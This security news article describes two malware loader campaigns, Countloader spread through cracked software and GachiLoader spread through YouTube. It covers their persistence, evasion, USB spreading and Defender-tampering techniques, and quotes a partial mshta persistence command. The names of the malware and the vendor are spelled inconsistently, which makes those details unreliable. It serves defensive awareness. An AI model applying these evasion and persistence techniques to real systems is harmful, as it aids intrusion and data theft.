Cybersecurity researchers have revealed details of a new campaign that uses cracked software distribution sites as a distribution vector for a new variant of the modular and stealthy loader called Counterloader.
The campaign “uses Countloader as the initial tool in a multistage attack to access, steal, and distribute additional malware families,” the Siderace Howler Cell threat intelligence team said in an analysis.
Counterloader was previously documented by both Fortinet and Silent Push, detailing the loader’s ability to push payloads such as Cobalt Strike, AdaptixC2, PureHVNC RAT, Ametra Stealer, and PureMiner. The loader has been found in the wild since at least June 2025.
The latest attack series begins when unsuspecting users attempt to download cracked versions of legitimate software such as Microsoft Word, causing them to be redirected to a MediaFire link hosting a malicious ZIP archive, which contains a Microsoft Word document with an encrypted ZIP file and a password to open the second archive.
Contained within the zip file is an altered legitimate Python interpreter (“Setup.exe”) that has been configured to execute a malicious command to retrieve Countloader 3.2 from a remote server using “mshta.exe”.
To establish persistence, the malware creates a scheduled task that mimics Google by using the name “GoogleTaskSystem136.0.7023.12” along with an identifier-like string. It is configured to run every 30 minutes for 10 years by invoking “mshta.exe” with a fallback domain.
It also checks whether CrowdStrike’s Falcon Security Appliance is installed on the host by querying the antivirus list through Windows Management Instrumentation (WMI). If the service is detected, run the persistence command as “cmd.exe /c start /b mshta.exe
Counterloader is equipped to profile the compromised host and fetch the next stage payload. The latest version of the malware adds the ability to propagate via removable USB drives and execute the malware directly in memory via “mshta.exe” or PowerShell. The complete list of supported features is as follows-
- Download an executable from a given URL and execute it
- Download a zip archive from the given URL and execute either a Python-based module or an EXE file contained within it
- Download the DLL from the given URL and run it via “rundll32.exe”
- Download an MSI installer package and install it
- Delete scheduled task used by loader
- Gather and export comprehensive system information
- Spread via removable media by creating malicious shortcuts (LNK) next to their hidden native counterparts, which, when launched, execute the original file and run the malware via “mshta.exe” with the C2 parameter.
- Launch “mshta.exe” directly against the given URL
- Execute remote powershell payload in memory
In the attack chain observed by Siderace, the final payload deployed by Countloader is an information stealer known as ACR Stealer, which is equipped to collect sensitive data from infected hosts.
“This campaign highlights the ongoing evolution and increased sophistication of counterloaders, reinforcing the need for proactive detection and layered defense strategies,” Sideres said. “Its ability to deliver ACR Stealer through a multi-stage process from tampering with Python libraries to in-memory shellcode unpacking highlights the growing trend of unsigned binary abuse and fileless execution tactics.”
YouTube Ghost Network Delivers GachiLoader
The revelation comes as Check Point revealed details of a new, highly obscure JavaScript malware loader called GachiLoader that is written in Node.js. The malware is distributed through the YouTube Ghost Network, which is a network of YouTube accounts engaged in malware distribution.
“A variant of Gachiloader deploys a second-stage malware, KidKaddy, which applies a new technique for portable executable (PE) injection,” said security researchers Sven Rath and Jaromír Horejsí. “This technique loads a legitimate DLL and abuses vectored exception handling to immediately replace it with a malicious payload.”
Nearly 100 YouTube videos have been flagged as part of the campaign, garnering nearly 220,000 views. These videos were uploaded from 39 hacked accounts, the first video was dated December 22, 2024. Most of these videos have since been removed by Google.
In at least one case, GachiLoader served as a vehicle for malware that stole Rhadamanthys information. Like other loaders, GachiLoader is used to deploy additional payloads on an infected machine, as well as fly under the radar to execute a series of anti-analysis checks.
It also checks whether it is running in an elevated context by running the “net session” command. In case the execution fails, it attempts to start itself with administrator privileges, which, in turn, triggers a User Account Control (UAC) prompt. There is a high chance that the victim will allow it to continue, as malware is likely to be distributed through fake installers for popular software, as reported in the case of Countloader.
In the final step, the malware attempts to kill “SecHealthUI.exe”, a process associated with Microsoft Defender, and configures Defender exclusions to avoid the security solution from flagging malicious payloads in certain folders (for example, C:\Users\, C:\ProgramData\, and C:\Windows\).
GachiLoader then proceeds to either fetch the final payload directly from a remote URL or employ another loader called “kidkadi.node”, which loads the main malware by abusing vectored exception handling.
“The threat actor behind GachiLoader demonstrated proficiency with Windows internals, coming up with a new variation of a known technique,” Check Point said. “This highlights the need for security researchers to stay up to date with malware techniques like PE injection and actively look for new ways in which malware authors try to avoid detection.”
